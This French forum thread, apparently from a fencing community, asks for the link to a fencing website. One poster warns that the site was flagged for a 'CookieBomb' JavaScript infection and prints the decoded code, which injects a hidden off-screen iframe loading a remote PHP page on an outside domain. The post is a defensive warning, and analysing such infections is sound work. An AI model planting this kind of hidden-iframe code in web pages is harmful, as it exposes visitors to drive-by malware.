Site Jean François

J'étais tombé sur le site de JF une fois mais je ne l'avais pas parcouru, et là impossible de le retrouver... Quelqu'un peut m'indiquer le lien svp ? J'ai parcouru cette section mais sans succès

http://jfgilles.perso.sfr.fr/escrime/index.html

merchi

C'est moi ou ça ne marche plus?

Comme il y a un Ok en haut de page, et que jf ne bosse pas le samedi aprem, je parie pour une maintenance du site

Si ça dure, on pourra légitimement s'inquiéter

Ça fait un petit moment maintenant...

J'y suis allé, depuis

Bonjour.

Attention danger (malheureusement !) : en voulant me documenter sur cet excellent site à mon retour de congés, à la fois mon antivirus ainsi que l'antivirus de mon entreprise (plus que fiable celui-là....) ont refusé d'ouvrir la page en indiquant la présence d'un exploit Javascript.

En creusant un petit peu...

• "Detected malicious CookieBomb javascript" remonté par URLQuery
  URL blacklistée sur scumware.org (remonté par URLVoid) : apparemment, il doit s'agir d'un serveur mutualisé dont les sites hébergés ont été infectés...
  

Bref, prudence....et il est conseillé de remonter ce type d'informations à l'hébergeur du site afin qu'il vérifie ce type d'information/entreprenne les actions ad-hoc si nécessaire...
Qq éléments trouvés sur le net : le code JS decodé du virus se retrouve sur le site à priori :
function co09() {
var static = 'ajax';
var controller = 'index.php';
var co = document.createElement('iframe');

co.src = 'http://newbodyart.es/jGvpmV8K.php';
co.style.position = 'absolute';
co.style.color = '6';
co.style.height = '6px';
co.style.width = '6px';
co.style.left = '10006';
co.style.top = '10006';

if (!document.getElementById('co')) {
document.write('

');
document.getElementById('co').appendChild(co);
}
}

function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
Explications sur un blog CISCO : http://blogs.cisco.com/security/crumbling-to-the-cookiebomb/
Ce que j'en ai compris : ça créée une iframe cachée qui redirige vers le site 'http://newbodyart.es/jGvpmV8K.php'
Ce site semble être roumain qui propose des tatouages....apparemment pas de virus sur le site (j'ai pu l'ouvrir).

POC pour ceux qui en veulent vraiment... http://malwaremustdie.blogspot.fr/2013/07/proof-of-concept-of-cookiebomb-attack.html

Bref, n'étant pas spécialiste sécurité, et si un pro lis ce post...merci de l'éclairage/corrections/compléments/signaler si je raconte n'importe quoi ;-)